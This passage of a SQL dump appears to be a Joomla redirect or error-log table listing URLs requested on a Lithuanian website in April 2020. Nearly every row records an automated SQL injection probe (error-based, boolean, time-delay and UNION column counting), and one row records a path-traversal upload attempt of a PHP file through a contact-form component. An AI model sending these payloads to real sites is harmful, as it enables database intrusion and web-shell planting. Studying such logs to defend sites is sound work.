(ELT(6980=6980,1))),0x716b627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Itemid=196','','','',1,0,'2020-04-13 00:29:26','0000-00-00 00:00:00'),(3651,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CONCAT(0x716b717a71,(SELECT (ELT(4144=4144,1))),0x716b627171))&Itemid=196','','','',1,0,'2020-04-13 00:29:28','0000-00-00 00:00:00'),(3652,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CHR(113)||CHR(107)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4287=4287) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(98)||CHR(113)||CHR(113)))&Itemid=196','','','',1,0,'2020-04-13 00:29:30','0000-00-00 00:00:00'),(3653,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1851=1851) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)+CHAR(113))&Itemid=19','','','',1,0,'2020-04-13 00:29:32','0000-00-00 00:00:00'),(3654,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1586868501.php','','','',1,0,'2020-04-14 14:48:08','0000-00-00 00:00:00'),(3655,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13&Itemid=197','','','',6,0,'2020-04-19 22:32:25','0000-00-00 00:00:00'),(3656,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND (SELECT 6205 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(6205=6205,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (6467=6467&view=category&id=1','','','',1,0,'2020-04-19 22:32:29','0000-00-00 00:00:00'),(3657,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 6205 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(6205=6205,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:32:30','0000-00-00 00:00:00'),(3658,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 6205 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(6205=6205,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- cEHO&view=category&id=13&Itemid=','','','',1,0,'2020-04-19 22:32:33','0000-00-00 00:00:00'),(3659,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 1666=CAST((CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1666=1666) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC) AND (4825=','','','',1,0,'2020-04-19 22:32:33','0000-00-00 00:00:00'),(3660,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 1666=CAST((CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1666=1666) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)&view=catego','','','',1,0,'2020-04-19 22:32:34','0000-00-00 00:00:00'),(3661,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 1666=CAST((CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (1666=1666) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)-- JwCc&view','','','',1,0,'2020-04-19 22:32:37','0000-00-00 00:00:00'),(3662,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 3920 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3920=3920) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113))) AND (4126','','','',1,0,'2020-04-19 22:32:38','0000-00-00 00:00:00'),(3663,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 3920 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3920=3920) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113)))&view=categ','','','',1,0,'2020-04-19 22:32:39','0000-00-00 00:00:00'),(3664,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 3920 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3920=3920) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113)))-- LohG&vie','','','',1,0,'2020-04-19 22:32:42','0000-00-00 00:00:00'),(3665,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 5927=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5927=5927) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(113)||CHR(10','','','',1,0,'2020-04-19 22:32:42','0000-00-00 00:00:00'),(3666,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 5927=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5927=5927) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(113)||CHR(107','','','',1,0,'2020-04-19 22:32:43','0000-00-00 00:00:00'),(3668,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT 3179 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(3179=3179,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:32:47','0000-00-00 00:00:00'),(3669,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CONCAT(0x71786a7071,(SELECT (ELT(9432=9432,1))),0x716b716b71))&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:32:48','0000-00-00 00:00:00'),(3670,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT (CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (3203=3203) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)))&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:32:48','0000-00-00 00:00:00'),(3671,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4752=4752) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113))&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:32:49','0000-00-00 00:00:00'),(3672,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT PG_SLEEP(5)--&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:32:52','0000-00-00 00:00:00'),(3673,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT PG_SLEEP(5)--&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:32:52','0000-00-00 00:00:00'),(3674,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(120)||CHR(66)||CHR(120),5) FROM DUAL--&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:32:59','0000-00-00 00:00:00'),(3675,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(120)||CHR(66)||CHR(120),5) FROM DUAL--&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:32:59','0000-00-00 00:00:00'),(3676,'http://infotytuvenai.lt/index.php/lt/?option=com_content) ORDER BY 1-- jALF&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:02','0000-00-00 00:00:00'),(3677,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL-- dsDJ&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:03','0000-00-00 00:00:00'),(3678,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL-- MnYy&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:04','0000-00-00 00:00:00'),(3679,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL-- kcxh&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:05','0000-00-00 00:00:00'),(3680,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL-- BsRI&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:06','0000-00-00 00:00:00'),(3681,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- rgVa&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:07','0000-00-00 00:00:00'),(3682,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- WZnO&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:07','0000-00-00 00:00:00'),(3683,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- okfi&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:08','0000-00-00 00:00:00'),(3684,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- tVRE&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:09','0000-00-00 00:00:00'),(3685,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RtjL&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:10','0000-00-00 00:00:00'),(3686,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- koHY&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:11','0000-00-00 00:00:00'),(3687,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- EBgS&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:12','0000-00-00 00:00:00'),(3688,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- UbOu&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:12','0000-00-00 00:00:00'),(3689,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- Foju&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:13','0000-00-00 00:00:00'),(3690,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- bdSM&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:14','0000-00-00 00:00:00'),(3691,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- TUQD&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:15','0000-00-00 00:00:00'),(3692,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- bhKE&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:16','0000-00-00 00:00:00'),(3693,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ZJWF&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:16','0000-00-00 00:00:00'),(3694,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hFQc&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:17','0000-00-00 00:00:00'),(3695,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Wdki&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:18','0000-00-00 00:00:00'),(3696,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Kljc&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:19','0000-00-00 00:00:00'),(3697,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- EpBy&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:20','0000-00-00 00:00:00'),(3698,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- CzRq&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:43','0000-00-00 00:00:00'),(3699,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- YmnU&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:44','0000-00-00 00:00:00'),(3700,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- DjJE&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:45','0000-00-00 00:00:00'),(3701,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- Mhwp&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:46','0000-00-00 00:00:00'),(3702,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- fJHk&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:46','0000-00-00 00:00:00'),(3703,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- SemZ&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:47','0000-00-00 00:00:00'),(3704,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- zeFv&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:48','0000-00-00 00:00:00'),(3705,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rISn&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:49','0000-00-00 00:00:00'),(3706,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HVWT&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:49','0000-00-00 00:00:00'),(3707,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- fgJD&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:50','0000-00-00 00:00:00'),(3708,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Wqne&view=category&id=13&Itemid=197','','','',1,0,'2020-04-19 22:33:51','0000-00-00 00:00:00'),(3709,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) AND (SELECT 5224 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(5224=5224,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (4048=404','','','',1,0,'2020-04-19 22:35:11','0000-00-00 00:00:00'),(3710,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 AND (SELECT 5224 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(5224=5224,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Itemid=197','','','',1,0,'2020-04-19 22:35:12','0000-00-00 00:00:00'),(3711,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 AND (SELECT 5224 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(5224=5224,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ptbn&Itemid=','','','',1,0,'2020-04-19 22:35:13','0000-00-00 00:00:00'),(3712,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) AND 9011=CAST((CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (9011=9011) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)) AS','','','',1,0,'2020-04-19 22:35:16','0000-00-00 00:00:00'),(3713,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 AND 9011=CAST((CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (9011=9011) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)) AS ','','','',1,0,'2020-04-19 22:35:17','0000-00-00 00:00:00'),(3715,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) AND 2757 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2757=2757) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+C','','','',1,0,'2020-04-19 22:35:20','0000-00-00 00:00:00'),(3716,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 AND 2757 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2757=2757) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CH','','','',1,0,'2020-04-19 22:35:21','0000-00-00 00:00:00'),(3718,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) AND 5467=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5467=5467) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(10','','','',1,0,'2020-04-19 22:35:25','0000-00-00 00:00:00'),(3719,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 AND 5467=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5467=5467) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107','','','',1,0,'2020-04-19 22:35:26','0000-00-00 00:00:00'),(3721,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=(SELECT 2671 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(2671=2671,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Itemid=197','','','',1,0,'2020-04-19 22:35:29','0000-00-00 00:00:00'),(3722,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=(SELECT CONCAT(0x71786a7071,(SELECT (ELT(5710=5710,1))),0x716b716b71))&Itemid=197','','','',1,0,'2020-04-19 22:35:30','0000-00-00 00:00:00'),(3723,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=(SELECT (CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (5427=5427) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)))&Itemid=197','','','',1,0,'2020-04-19 22:35:31','0000-00-00 00:00:00'),(3724,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=(SELECT CHAR(113)+CHAR(120)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7469=7469) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113))&Itemid=','','','',1,0,'2020-04-19 22:35:32','0000-00-00 00:00:00'),(3725,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13);SELECT PG_SLEEP(5)--&Itemid=197','','','',1,0,'2020-04-19 22:35:33','0000-00-00 00:00:00'),(3726,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13;SELECT PG_SLEEP(5)--&Itemid=197','','','',1,0,'2020-04-19 22:35:34','0000-00-00 00:00:00'),(3727,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(117)||CHR(101)||CHR(99),5) FROM DUAL--&Itemid=197','','','',1,0,'2020-04-19 22:35:40','0000-00-00 00:00:00'),(3728,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(117)||CHR(101)||CHR(99),5) FROM DUAL--&Itemid=197','','','',1,0,'2020-04-19 22:35:41','0000-00-00 00:00:00'),(3729,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) ORDER BY 1-- hTfE&Itemid=197','','','',1,0,'2020-04-19 22:35:44','0000-00-00 00:00:00'),(3730,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) ORDER BY 6165-- hYHl&Itemid=197','','','',1,0,'2020-04-19 22:35:45','0000-00-00 00:00:00'),(3731,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) UNION ALL SELECT NULL-- kYWc&Itemid=197','','','',1,0,'2020-04-19 22:35:45','0000-00-00 00:00:00'),(3732,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) UNION ALL SELECT NULL,NULL-- xDDI&Itemid=197','','','',1,0,'2020-04-19 22:35:47','0000-00-00 00:00:00'),(3733,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) UNION ALL SELECT NULL,NULL,NULL-- qecR&Itemid=197','','','',1,0,'2020-04-19 22:35:48','0000-00-00 00:00:00'),(3734,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) UNION ALL SELECT NULL,NULL,NULL,NULL-- Kire&Itemid=197','','','',1,0,'2020-04-19 22:35:49','0000-00-00 00:00:00'),(3735,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- IcxF&Itemid=197','','','',1,0,'2020-04-19 22:35:50','0000-00-00 00:00:00'),(3736,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- geVK&Itemid=197','','','',1,0,'2020-04-19 22:35:51','0000-00-00 00:00:00'),(3737,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- iLmm&Itemid=197','','','',1,0,'2020-04-19 22:35:52','0000-00-00 00:00:00'),(3738,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WijL&Itemid=197','','','',1,0,'2020-04-19 22:35:53','0000-00-00 00:00:00'),(3739,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HNyo&Itemid=197','','','',1,0,'2020-04-19 22:35:53','0000-00-00 00:00:00'),(3740,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ngaY&Itemid=197','','','',1,0,'2020-04-19 22:35:54','0000-00-00 00:00:00'),(3741,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 ORDER BY 1-- weqN&Itemid=197','','','',1,0,'2020-04-19 22:35:55','0000-00-00 00:00:00'),(3742,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 ORDER BY 1933-- kWSA&Itemid=197','','','',1,0,'2020-04-19 22:35:56','0000-00-00 00:00:00'),(3743,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL-- RGRr&Itemid=197','','','',1,0,'2020-04-19 22:35:58','0000-00-00 00:00:00'),(3744,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL-- oCkr&Itemid=197','','','',1,0,'2020-04-19 22:35:59','0000-00-00 00:00:00'),(3745,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL-- Hbmh&Itemid=197','','','',1,0,'2020-04-19 22:35:59','0000-00-00 00:00:00'),(3746,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL-- ckMb&Itemid=197','','','',1,0,'2020-04-19 22:36:00','0000-00-00 00:00:00'),(3747,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ZJZA&Itemid=197','','','',1,0,'2020-04-19 22:36:01','0000-00-00 00:00:00'),(3748,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- JNLw&Itemid=197','','','',1,0,'2020-04-19 22:36:02','0000-00-00 00:00:00'),(3749,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hSdq&Itemid=197','','','',1,0,'2020-04-19 22:36:03','0000-00-00 00:00:00'),(3750,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hhTc&Itemid=197','','','',1,0,'2020-04-19 22:36:03','0000-00-00 00:00:00'),(3751,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- EsSz&Itemid=197','','','',1,0,'2020-04-19 22:36:04','0000-00-00 00:00:00'),(3752,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ksDM&Itemid=197','','','',1,0,'2020-04-19 22:36:05','0000-00-00 00:00:00'),(3753,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 ORDER BY 1-- EQSF&Itemid=197','','','',1,0,'2020-04-19 22:36:06','0000-00-00 00:00:00'),(3754,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 ORDER BY 5857-- TfNm&Itemid=197','','','',1,0,'2020-04-19 22:36:06','0000-00-00 00:00:00'),(3755,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL-- sXSQ&Itemid=197','','','',1,0,'2020-04-19 22:36:07','0000-00-00 00:00:00'),(3756,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL-- xrmQ&Itemid=197','','','',1,0,'2020-04-19 22:36:08','0000-00-00 00:00:00'),(3757,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL-- Lpoy&Itemid=197','','','',1,0,'2020-04-19 22:36:09','0000-00-00 00:00:00'),(3758,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL-- fkMw&Itemid=197','','','',1,0,'2020-04-19 22:36:10','0000-00-00 00:00:00'),(3759,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- iPdI&Itemid=197','','','',1,0,'2020-04-19 22:36:10','0000-00-00 00:00:00'),(3760,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- Hvwt&Itemid=197','','','',1,0,'2020-04-19 22:36:11','0000-00-00 00:00:00'),(3761,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=category&id=13 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- LQEa&Itemid=197','','','',1,0,'2020-04-19 22:36:12','0000-00-00 